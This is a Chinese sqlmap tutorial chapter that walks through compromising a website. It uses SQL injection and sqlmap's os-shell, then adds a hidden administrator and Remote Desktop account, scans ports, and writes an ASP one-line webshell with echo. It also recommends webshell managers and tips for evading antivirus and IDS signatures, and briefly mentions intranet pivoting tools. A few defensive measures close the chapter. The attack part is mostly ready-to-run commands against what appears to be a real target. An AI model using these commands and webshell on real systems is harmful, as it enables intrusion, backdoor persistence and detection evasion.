sqlmap从入门到精通-第六章-6-8 利用sqlmap渗透某站点

6.8 利用sqlmap渗透某站点

6.8.1 发现并测试SQL注入漏洞

1. SQL注入漏洞发现思路

(1) 通AWVS等扫描工具对目标站点进行扫描,根据扫描结果判断是否存在注入

(2) Burpsuite抓包测试,通过手工或加载插件进行自动化测试

(3) 手工目测,整体的浏览网页对认为存在SQL注入的地方进行测试

2. 发现目标站点SQL注入点

这里一般就是看是否存在参数传递的方式提交请求,然后简单的判断确认

3. 使用sqlmap进行注入测试

6.8.2 获取webshell及提权

1. 通过sqlmap获取当前目标系统信息

sqlmap.py -u url --dbs --is-dba --user

2. 获取os-shell权限

sqlmap.py -u url --os-shell

(1) 查看3389端口

netstat -ano

(2) 添加管理员权限

net user bmfx bmfx /add

net localgroup administrators bmfx /add

net localgroup "Remote Desktop Users" bmfx /add

(3) 对目标服务器进行端口扫描

使用nmap扫描或者使用masscan进行全端口扫描

nmap -p- 192.168.1.23

masscan -p 1-65535 192.168.1.23

(4) 查看主机网络配置

ipconfig /all

3. 获取webshell

(1) 逐个查看磁盘内容

dir C:

(2) 查看网站目录

dir E:web

(3) 直接写入ASP的一句话

知道绝对路径直接使用echo命令写入一句话

echo ^<%execute(request("bmfx"))^%>>E:webwwwmfx.asp

(4) 成功获取webshell

使用菜刀连接

这里推荐下webshell管理工具,https://www.cnblogs.com/xiaozi/p/12397211.html

我个人推荐使用蚁剑和冰蝎,菜刀以后就不要使用了,因为其特征明显,容易被杀毒软件或IDS,IPS等各种安全类软件识别特征并拦截,除非你能够手动更改特征,否则就不要使用了,如果要更改特征可以参考:https://mp.weixin.qq.com/s/hbBKQRaMg-b68lJ9k8Rh4A 

6.8.3 突破内网进入服务器

1. 使用Tunna等进行内网转发失败

进入到内网服务器之后一般是可以通Tunna,reGeorg等工具进行端口转发,作者这里并没成功,关于进入内网服务器之后使用到的端口转发技术,我会拿专题来讲解,内容很多,待我以后慢慢道来;目前如果想知道本节讲到的这两个工具的使用,可以在网上搜搜

2. lcx穿透内网

这里也略过,现在推荐是ew或者gost,大家感兴趣的先网上看看

6.8.4 渗透总结与防御

1. 本次渗透总结

(1) 真正的目标主机渗透成功之后,突破内网进入服务器与本地模拟环境测试还是有很大的区别,网上很多代理穿透软件和脚本在真正的环境中使用存在一定的问题,所以需要多多尝试

(2) lcx是经典的内网穿透工具,要使用它必须有自己的公网独立IP地址,这类问题直接购买云服务器即可,也就是我们常说的vps

(3) sqlmap功能强大,可以解决很多实际问题

2. 安全防御

(1) 通过公开Web漏洞扫描器对网站进行漏洞扫描,对发现的漏洞进行修复

(2) 对网站代码进行审计,修复明显的漏洞

(3) 严格控制网站脚本的权限,文件上传目录有写入权限,但是无脚本执行权限

(4) 网站应用中经理使用最少数据库账号权限,单独应用对应单独账号

(5) 在服务器上安装杀毒软件或者WAF防护软件

迷茫的人生,需要不断努力,才能看清远方模糊的志向!
原文地址:https://www.cnblogs.com/autopwn/p/13402997.html